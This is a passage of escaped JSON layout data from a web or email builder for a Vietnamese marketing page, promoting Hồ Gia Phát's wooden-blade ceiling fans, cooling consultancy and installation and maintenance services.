20px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#db1908\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_27\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><strong>QU\\u1ea0T TR\\u1ea6N C\\u00c1NH G\\u1ed6 (SOLID WOOD)<\\/strong><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"HjSkOv8qX8\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px 10px 0px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#1b2a2f\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_28\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 22px; line-height: 30.8px;\\\\\\\"><strong>KI\\u1ec2U D\\u00c1NG HI\\u1ec6N \\u0110\\u1ea0I<\\/strong><\\/span><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"xrIkTs9OgD\\\",\\\"type\\\":\\\"heading\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"headingType\\\":\\\"h3\\\",\\\"fontSize\\\":\\\"13px\\\",\\\"color\\\":\\\"#236fa1\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_heading_1\\\",\\\"htmlClassNames\\\":\\\"u_content_heading\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<strong>THO\\u1ea2I M\\u00c1I S\\u00c1NG T\\u1ea0O TU\\u1ef2 CH\\u1eccN M\\u00c0U<\\/strong>\\\"}},{\\\"id\\\":\\\"eYdD2v3nEX\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 30px 10px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#0e0f13\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"160%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_29\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 160%;\\\\\\\">Hi\\u1ec7n nay qu\\u1ea1t tr\\u1ea7n c\\u00e1nh g\\u1ed7 t\\u1ef1 nhi\\u00ean qua x\\u1eed l\\u00fd ch\\u1ed1ng cong v\\u00eanh ho\\u1eb7c \\u0111\\u01b0\\u1ee3c x\\u1eed l\\u00fd th\\u00e0nh t\\u1ea5m nguy\\u00ean kh\\u1ed1i \\u0111ang \\u0111\\u01b0\\u1ee3c nhi\\u1ec1u ng\\u01b0\\u1eddi \\u01b0a chu\\u1ed9ng b\\u1edfi t\\u00ednh \\u0111\\u1ed9c \\u0111\\u00e1o v\\u00e0 ph\\u00f9 h\\u1ee3p v\\u1edbi c\\u00e1c thi\\u1ebft k\\u1ebf n\\u1ed9i th\\u1ea5t hi\\u1ec7n nay. B\\u1edfi g\\u1ed7 t\\u1ef1 nhi\\u00ean (Solid Wood) \\u0111\\u01b0\\u1ee3c \\u01b0a chu\\u1ed9ng b\\u1edfi d\\u1ec5 ph\\u1ed1i m\\u00e0u v\\u00e0 tu\\u1ef3 ch\\u1ec9nh tone m\\u00e0u c\\u00f9ng v\\u1edbi c\\u00e1c n\\u1ed9i th\\u1ea5t nh\\u00e0 chung c\\u01b0\\/nh\\u00e0 ph\\u1ed1 c\\u00f3 thi\\u1ebft k\\u1ebf g\\u1ed7 \\u00f3c ch\\u00f3, g\\u1ed7 s\\u1ed3i... t\\u1ea1o \\u0111i\\u1ec3m nh\\u1ea5n cho c\\u0103n ph\\u00f2ng c\\u00e0ng th\\u00eam phong c\\u00e1ch.<\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"LuRH-I-q_Y\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 10px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-nha-o\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#1b2a2f\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_7\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"line-height: 16.8px;\\\\\\\">XEM TH\\u00caM<\\/span>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":109,\\\"calculatedHeight\\\":37}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_21\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_15\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"fyEFs2OfCp\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"D0IQ6ZM4sR\\\",\\\"contents\\\":[{\\\"id\\\":\\\"pRF-ulYOnC\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"30px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/du-an-da-trien-khai\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#db1908\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"20px 40px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_10\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"line-height: 16.8px;\\\\\\\">XEM TH\\u00caM D\\u1ef0 \\u00c1N L\\u1eaeP \\u0110\\u1eb6T<\\/span>\\\",\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":256,\\\"calculatedHeight\\\":57}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_18\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_13\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"fkik_g4BzN\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"2LQ7U_SkJw\\\",\\\"contents\\\":[{\\\"id\\\":\\\"o71IKU6xIA\\\",\\\"type\\\":\\\"heading\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"headingType\\\":\\\"h3\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Open Sans\\\",\\\"value\\\":\\\"\'Open Sans\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Open+Sans:400,700\\\",\\\"defaultFont\\\":true,\\\"weights\\\":[400,700]},\\\"fontWeight\\\":400,\\\"fontSize\\\":\\\"20px\\\",\\\"color\\\":\\\"#f1c40f\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_heading_3\\\",\\\"htmlClassNames\\\":\\\"u_content_heading\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"THI\\u1ebeT K\\u1ebe T\\u01af V\\u1ea4N GI\\u1ea2I PH\\u00c1P QU\\u1ea0T L\\u00c0M M\\u00c1T\\\"}},{\\\"id\\\":\\\"hnCvJSjSYD\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Lato\\\",\\\"value\\\":\\\"\'Lato\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Lato:400,700\\\",\\\"defaultFont\\\":true,\\\"weights\\\":[400,700]},\\\"fontWeight\\\":700,\\\"fontSize\\\":\\\"17px\\\",\\\"color\\\":\\\"#2dc26b\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_37\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\">D\\u00e0nh cho nh\\u00e0 x\\u01b0\\u1edfng, c\\u00f4ng nghi\\u1ec7p, v\\u0103n ph\\u00f2ng th\\u01b0\\u01a1ng m\\u1ea1i, nh\\u00e0 \\u1edf cao c\\u1ea5p.<\\/p>\\\"}},{\\\"id\\\":\\\"Y4L0bNJWI7\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"30px 10px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_30\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\">L\\u01afU L\\u01af\\u1ee2NG KH\\u00d4NG KH\\u00cd, HI\\u1ec6U QU\\u1ea2 V\\u00c0 TR\\u1ea2I NGHI\\u1ec6M T\\u1ed0T H\\u01a0N CHO GIA \\u0110\\u00ccNH HO\\u1eb6C C\\u01a0 QUAN L\\u00c0M VI\\u1ec6C<\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"rKNPh49QYC\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 30px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#f5f5f5\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"160%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_33\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 160%;\\\\\\\">V\\u1edbi kinh nghi\\u1ec7m h\\u01a1n 10 n\\u0103m cung c\\u1ea5p l\\u1eafp \\u0111\\u1eb7t qu\\u1ea1t tr\\u1ea7n. Hi\\u1ec7n nay HGP (H\\u1ed3 Gia Ph\\u00e1t) l\\u00e0 \\u0111\\u1ea1i \\u0111i\\u1ec7n ph\\u00e2n ph\\u1ed1i \\u0111\\u1ed9c quy\\u1ec1n cho th\\u01b0\\u01a1ng hi\\u1ec7u Big Ass Fans, Haiku - th\\u01b0\\u01a1ng hi\\u1ec7u qu\\u1ea1t h\\u00e0ng \\u0111\\u1ea7u c\\u1ee7a Hoa K\\u1ef3 v\\u00e0 Tổ chức đào tạo WIT (China), WildMill (India) - d\\u00f2ng qu\\u1ea1t tr\\u1ea7n trang tr\\u00ed c\\u1ed5 \\u0111i\\u1ec3n - \\u0111a d\\u1ea1ng ki\\u1ec3u d\\u00e1ng &amp; k\\u00edch th\\u01b0\\u1edbc.<\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_17\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#1b2a2f\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_12\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"O4sajEw9_M\\\",\\\"cells\\\":[1,1],\\\"columns\\\":[{\\\"id\\\":\\\"EFldpPdijy\\\",\\\"contents\\\":[{\\\"id\\\":\\\"RIdDTofhYR\\\",\\\"type\\\":\\\"heading\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"headingType\\\":\\\"h3\\\",\\\"fontSize\\\":\\\"18px\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_heading_4\\\",\\\"htmlClassNames\\\":\\\"u_content_heading\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"\\u1ee8ng d\\u1ee5ng Mua H\\u00e0ng\\u00a0<br \\/>\\u0110\\u1eb7t l\\u1ecbch l\\u1eafp \\u0111\\u1eb7t - b\\u1ea3o tr\\u00ec\\\"}},{\\\"id\\\":\\\"zLMAztbOg2\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#BBBBBB\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_6\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"ZkainPMVrL\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Source Sans Pro\\\",\\\"value\\\":\\\"\'Source Sans Pro\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Source+Sans+Pro:400,700\\\",\\\"defaultFont\\\":true,\\\"weights\\\":[400,700]},\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_38\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<ul style=\\\\\\\"list-style-type: square;\\\\\\\">\\\\n<li style=\\\\\\\"line-height: 19.6px;\\\\\\\">B\\u1ea1n c\\u1ea7n \\u0111\\u1eb7t h\\u00e0ng qu\\u1ea1t tr\\u1ea7n nhanh ?<\\/li>\\\\n<li style=\\\\\\\"line-height: 19.6px;\\\\\\\">B\\u1ea1n c\\u1ea7n s\\u1eed d\\u1ee5ng l\\u1eafp \\u0111\\u1eb7t qu\\u1ea1t tr\\u1ea7n chuy\\u00ean nghi\\u1ec7p?<\\/li>\\\\n<li style=\\\\\\\"line-height: 19.6px;\\\\\\\">B\\u1ea1n c\\u1ea7n d\\u1ecbch v\\u1ee5 b\\u1ea3o d\\u01b0\\u1ee1ng, b\\u1ea3o tr\\u00ec qu\\u1ea1t tr\\u1ea7n?<\\/li>\\\\n<\\/ul>\\\"}},{\\\"id\\\":\\\"cJl6xd24Sb\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#BBBBBB\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_7\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_35\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}},{\\\"id\\\":\\\"nOiOPuxKKt\\\",\\\"contents\\\":[{\\\"id\\\":\\\"XReSYqXQor\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"40px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678764058271-br-code-app.jpg\\\",\\\"width\\\":600,\\\"height\\\":600},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_9\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_36\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"center\\\"},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_25\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"OIZxZQ05r6\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"-RLsY6UJmh\\\",\\\"contents\\\":[{\\\"id\\\":\\\"_KgIg1jzP-\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#BBBBBB\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_5\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"EaOHGzYLYo\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#3AAEE0\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"4px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_16\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"line-height: 16.8px;\\\\\\\">Li\\u00ean h\\u1ec7 